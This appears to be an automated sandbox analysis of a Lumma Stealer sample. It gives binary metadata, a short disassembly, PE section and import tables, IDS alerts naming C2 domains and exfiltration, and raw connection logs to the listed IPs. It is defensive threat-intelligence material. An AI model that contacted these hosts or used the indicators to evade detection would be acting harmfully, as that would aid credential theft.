                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:AD1BCBF19AE2F91BB114D33B85359E56
                                                                                                                          Thumbprint SHA-1:141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
                                                                                                                          Thumbprint SHA-256:A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
                                                                                                                          Serial:00D0461B529F67189D43744E9CEFE172AE
                                                                                                                          Instruction
                                                                                                                          call 00007F3498C7EBEBh
                                                                                                                          jmp 00007F3498C7E7FDh
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                          call 00007F3498C7E99Fh
                                                                                                                          neg eax
                                                                                                                          pop ecx
                                                                                                                          sbb eax, eax
                                                                                                                          neg eax
                                                                                                                          dec eax
                                                                                                                          pop ebp
                                                                                                                          ret
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          cmp dword ptr [0043E488h], FFFFFFFFh
                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                          jne 00007F3498C7E999h
                                                                                                                          call 00007F3498C8081Bh
                                                                                                                          jmp 00007F3498C7E99Dh
                                                                                                                          push 0043E488h
                                                                                                                          call 00007F3498C8079Eh
                                                                                                                          pop ecx
                                                                                                                          neg eax
                                                                                                                          pop ecx
                                                                                                                          sbb eax, eax
                                                                                                                          not eax
                                                                                                                          and eax, dword ptr [ebp+08h]
                                                                                                                          pop ebp
                                                                                                                          ret
                                                                                                                          push 00000008h
                                                                                                                          push 0043C8E0h
                                                                                                                          call 00007F3498C7EF0Dh
                                                                                                                          and dword ptr [ebp-04h], 00000000h
                                                                                                                          mov eax, 00005A4Dh
                                                                                                                          cmp word ptr [00400000h], ax
                                                                                                                          jne 00007F3498C7E9EFh
                                                                                                                          mov eax, dword ptr [0040003Ch]
                                                                                                                          cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                          jne 00007F3498C7E9DEh
                                                                                                                          mov ecx, 0000010Bh
                                                                                                                          cmp word ptr [eax+00400018h], cx
                                                                                                                          jne 00007F3498C7E9D0h
                                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                                          mov ecx, 00400000h
                                                                                                                          sub eax, ecx
                                                                                                                          push eax
                                                                                                                          push ecx
                                                                                                                          call 00007F3498C7EB12h
                                                                                                                          pop ecx
                                                                                                                          pop ecx
                                                                                                                          test eax, eax
                                                                                                                          je 00007F3498C7E9B9h
                                                                                                                          cmp dword ptr [eax+24h], 00000000h
                                                                                                                          jl 00007F3498C7E9B3h
                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                          mov al, 01h
                                                                                                                          jmp 00007F3498C7E9B1h
                                                                                                                          mov eax, dword ptr [ebp-14h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          xor ecx, ecx
                                                                                                                          cmp dword ptr [eax], C0000005h
                                                                                                                          sete cl
                                                                                                                          mov eax, ecx
                                                                                                                          ret
                                                                                                                          mov esp, dword ptr [ebp-18h]
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3c0540x28.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x8ca000x2e80.coS
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x2608.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x371600xc0.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3c1980x11c.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x3544c0x35600479743414830a5568bcada3f710e0c1aFalse0.49541221457845436data6.9570693373870895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x370000x5e440x6000fa3c2f19487ee30f8cd241552465a803False0.4083251953125data4.760675312198424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x3d0000x1ba40x1000ff4f8fd6963b4f7d1c08f13031fa0788False0.470703125OpenPGP Secret Key4.849894766585126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .00cfg0x3f0000x80x200056d58e83a0a9dfd46d11d226dee9030False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x400000x26080x280001d8884685c61e5615f1d070b294bafcFalse0.7767578125data6.602867365262165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          .coS0x430000x4d4000x4d4006db305dec2cdadff4d5bbbc9bb78b961False1.0003350020226538data7.999328108956239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          DLLImport
                                                                                                                          KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-11-21T16:53:00.244535+01002057646ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)1192.168.2.4654371.1.1.153UDP
                                                                                                                          2024-11-21T16:53:01.849846+01002057647ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)1192.168.2.449733104.21.43.198443TCP
                                                                                                                          2024-11-21T16:53:01.849846+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.43.198443TCP
                                                                                                                          2024-11-21T16:53:02.533163+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733104.21.43.198443TCP
                                                                                                                          2024-11-21T16:53:02.533163+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.43.198443TCP
                                                                                                                          2024-11-21T16:53:02.928237+01002057668ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs)1192.168.2.4582171.1.1.153UDP
                                                                                                                          2024-11-21T16:53:02.928237+01002057697ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs)1192.168.2.4582171.1.1.153UDP
                                                                                                                          2024-11-21T16:53:03.175291+01002057658ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs)1192.168.2.4619311.1.1.153UDP
                                                                                                                          2024-11-21T16:53:04.773518+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449734172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:04.773518+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:05.490496+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:05.490496+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:07.304425+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449735172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:07.304425+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:08.044029+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449735172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:08.044029+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:09.637707+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449736172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:09.637707+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:11.904443+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449737172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:11.904443+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:14.238396+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449738172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:14.238396+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:17.118224+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449740172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:17.118224+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:17.867851+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449740172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:19.296454+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449744172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:19.296454+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:22.158221+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.449746172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:22.158221+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746172.67.206.172443TCP
                                                                                                                          2024-11-21T16:53:22.898587+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746172.67.206.172443TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 21, 2024 16:53:00.572503090 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:00.572559118 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:00.572662115 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:00.575666904 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:00.575695038 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:01.849714994 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:01.849845886 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:01.863226891 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:01.863284111 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:01.863715887 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:01.917469978 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:01.926575899 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:01.926626921 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:01.926695108 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:02.533148050 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:02.533242941 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:02.533350945 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:02.596353054 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:02.596406937 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:02.596448898 CET49733443192.168.2.4104.21.43.198
                                                                                                                          Nov 21, 2024 16:53:02.596467018 CET44349733104.21.43.198192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:03.501310110 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:03.501347065 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:03.501449108 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:03.501884937 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:03.501900911 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:04.773416042 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:04.773518085 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:04.776412010 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:04.776421070 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:04.776820898 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:04.778561115 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:04.778600931 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:04.778645992 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:05.490461111 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:05.490576982 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:05.490627050 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:05.505897045 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:05.505909920 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:05.505937099 CET49734443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:05.505943060 CET44349734172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:06.040349960 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:06.040446997 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:06.040539026 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:06.041747093 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:06.041781902 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:07.304291964 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:07.304425001 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:07.306143999 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:07.306157112 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:07.306498051 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:07.307864904 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:07.307864904 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:07.307951927 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.043956995 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.044004917 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.044035912 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.044064999 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.044085979 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.044097900 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.044133902 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.044168949 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.044193029 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.046435118 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.054825068 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.054889917 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.054903030 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.063234091 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.063363075 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.063374996 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.104995966 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.105014086 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.151866913 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.165209055 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.214440107 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.251440048 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.255434990 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.255507946 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.255526066 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.255656958 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.255923033 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.255964041 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.255992889 CET49735443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.256011009 CET44349735172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.370498896 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.370604038 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:08.370717049 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.371134996 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:08.371146917 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:09.637597084 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:09.637706995 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:09.639040947 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:09.639050007 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:09.639394999 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:09.640543938 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:09.640707970 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:09.640743017 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:09.640824080 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:09.640830994 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:10.517935991 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:10.518172979 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:10.518239021 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:10.518275023 CET49736443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:10.518294096 CET44349736172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:10.630341053 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:10.630433083 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:10.630522966 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:10.630794048 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:10.630826950 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:11.904347897 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:11.904443026 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:11.908401966 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:11.908430099 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:11.908860922 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:11.910172939 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:11.910397053 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:11.910443068 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:12.672852039 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:12.673101902 CET44349737172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:12.673131943 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:12.673170090 CET49737443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:12.973896027 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:12.973965883 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:12.974121094 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:12.974594116 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:12.974611044 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:14.238311052 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:14.238395929 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:14.239934921 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:14.239942074 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:14.240183115 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:14.241755962 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:14.241899967 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:14.241933107 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:14.242014885 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:14.242022038 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:15.154295921 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:15.154405117 CET44349738172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:15.154814005 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:15.154901028 CET49738443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:15.788804054 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:15.788903952 CET44349740172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:15.789011955 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:15.789582968 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:15.789602041 CET44349740172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:17.118093014 CET44349740172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:17.118223906 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:17.175429106 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:17.175477982 CET44349740172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:17.176371098 CET44349740172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:17.178092957 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:17.179014921 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:17.179033041 CET44349740172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:17.867963076 CET44349740172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:17.868215084 CET49740443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:18.010845900 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:18.010886908 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:18.011012077 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:18.011385918 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:18.011403084 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:19.296331882 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:19.296453953 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:19.298209906 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:19.298221111 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:19.298655033 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:19.300358057 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:19.300481081 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:19.300487995 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:20.804935932 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:20.805042028 CET44349744172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:20.805248022 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:20.805274963 CET49744443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:20.935633898 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:20.935698032 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:20.935791016 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:20.937026024 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:20.937053919 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:22.158117056 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:22.158221006 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:22.160269022 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:22.160286903 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:22.160619974 CET44349746172.67.206.172192.168.2.4
